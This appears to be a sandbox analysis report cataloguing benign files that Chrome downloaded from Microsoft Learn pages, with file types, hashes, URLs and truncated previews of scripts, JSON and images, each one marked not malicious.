                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:HMB:k
                                                                                                                                                                                            MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                            SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                            SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                            SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                            Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):195719
                                                                                                                                                                                            Entropy (8bit):5.430057012529021
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
                                                                                                                                                                                            MD5:9445D8D43537540BC89651C93A9C3832
                                                                                                                                                                                            SHA1:EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
                                                                                                                                                                                            SHA-256:586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
                                                                                                                                                                                            SHA-512:F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                            Malicious:false
